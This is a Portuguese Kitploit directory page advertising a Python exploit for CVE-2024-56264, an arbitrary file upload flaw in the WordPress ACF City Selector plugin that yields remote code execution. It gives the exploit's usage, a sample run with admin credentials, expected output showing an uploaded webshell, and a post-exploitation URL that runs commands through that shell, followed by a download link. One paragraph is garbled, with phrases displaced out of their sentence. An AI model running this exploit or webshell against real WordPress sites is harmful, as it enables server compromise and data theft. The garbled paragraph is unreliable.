Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-56264 — Exploração em Python para CVE-2024-56264, uma vulnerabilidade de upload arbitrário de arquivos no plugin WordPress ACF City Selector <=1.14.0, permitindo execução remota de código por meio de upload de webshell. | Kitploit
Ferramentas/GitHubGitHub/dpakmrya/cve-2024-56264
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubdpakmrya/cve-2024-56264

CVE-2024-56264

Exploração em Python para CVE-2024-56264, uma vulnerabilidade de upload arbitrário de arquivos no plugin WordPress ACF City Selector <=1.14.0, permitindo execução remota de código por meio de upload de webshell.

Ver Repositório
1há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-56264

WordPress ACF City Selector - Exploit de Upload Arbitrário de Arquivo (CVE-2024-56264)

Visão Geral

Este repositório contém um exploit para CVE-2024-56264, que é uma vulnerabilidade de Upload Arbitrário de Arquivo encontrada no plugin ACF City Selector do WordPress (versões <= 1.14.0). Esta vulnerabilidade permite que um invasor carregue um arquivo PHP malicioso (web shell) em uma instância vulnerável do WordPress e execute comandos arbitrários no servidor.

Detalhes do CVE

  • CVE ID: CVE-2024-56264
  • Data de Publicação: 2 de janeiro de 2025
  • Plugin Afetado: ACF City Selector
  • Versões Vulneráveis: <= 1.14.0
  • Impacto: Execução Remota de Código (RCE) via upload irrestrito de arquivo

Descrição

O plugin ACF City Selector falha ao validar adequadamente os arquivos carregados, permitindo que invasores e carreguem . Uma vez que um arquivo PHP malicioso é carregado, um invasor pode executar comandos do sistema remotamente, levando a .

contornem restrições
arquivos PHP arbitrários
comprometimento total do servidor

Requisitos

📌 Dependências

Certifique-se de que os seguintes itens estejam instalados antes de executar o script:

  • Python 3.x
  • módulo requests (Instale usando: pip install requests)

Você pode instalar todas as dependências necessárias usando:

root@kitploit:~
pip install -r requirements.txt

🚀 Uso

Executando o exploit:

root@kitploit:~
usage: CVE-2024-56264.py [-h] --url URL --username USERNAME --password PASSWORD

WordPress ACF City Selector plugin <= 1.14.0 - Arbitrary File Upload vulnerability

options:
  -h, --help           show this help message and exit
  --url URL            Website base URL (e.g., http://192.168.100.74/wordpress)
  --username USERNAME  WordPress username
  --password PASSWORD  WordPress password

Exemplo:

root@kitploit:~
python CVE-2024-56264.py --url http://192.168.100.74:888/wordpress --username admin --password admin

Saída Esperada

Após exploração bem-sucedida, você deve ver:

root@kitploit:~
[+] Detected plugin version: 1.14.0
[+] Vulnerable version detected! Proceeding with exploitation.
[+] Logged in successfully.
[+] Extracted nonce: abc1234
[+] Shell uploaded successfully: http://wordpress/wp-content/uploads/acfcs/q.php

Pós-Exploração

Se bem-sucedido, acesse o shell carregado via:

root@kitploit:~
http://wordpress/wp-content/uploads/acfcs/q.php?cmd=whoami

Isso permite execução remota de comandos no servidor.

⚠ Aviso Legal

Este script é destinado apenas para fins educacionais e de teste de segurança autorizados. O uso não autorizado é ilegal e pode resultar em consequências severas. O autor não é responsável por qualquer uso indevido deste exploit.

Baixar ferramenta